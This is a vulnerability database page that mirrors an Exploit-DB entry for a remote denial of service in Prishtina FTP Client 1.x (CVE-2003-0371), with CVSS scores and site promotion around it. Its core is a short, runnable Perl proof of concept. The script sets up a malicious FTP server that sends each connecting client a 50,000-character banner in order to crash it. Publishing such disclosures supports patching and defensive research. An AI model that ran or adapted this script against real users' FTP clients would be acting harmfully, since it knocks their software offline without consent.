Lucene search
+L

Prishtina FTP Client 1.x - Remote Denial of Service

🗓️ 23 May 2003 00:00:00Reported by DHGROUPType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

Prishtina FTP Client 1.x is vulnerable to remote denial of service via oversized server banners.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-0371
6 Jun 200304:00
cve
cvelist
Cvelist
CVE-2003-0371
6 Jun 200304:00
cvelist
euvd
EUVD
EUVD-2003-0366
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-0371
16 Jun 200304:00
nvd
source: https://www.securityfocus.com/bid/7671/info

Prishtina FTP client is allegedly prone to a denial of service vulnerability. The condition is reportedly triggered when processing FTP server banners of excessive length. As a result, a malicious attacker-controlled server may be used to crash a target users FTP client.

#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$buf\n";
 close($client);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.06406
35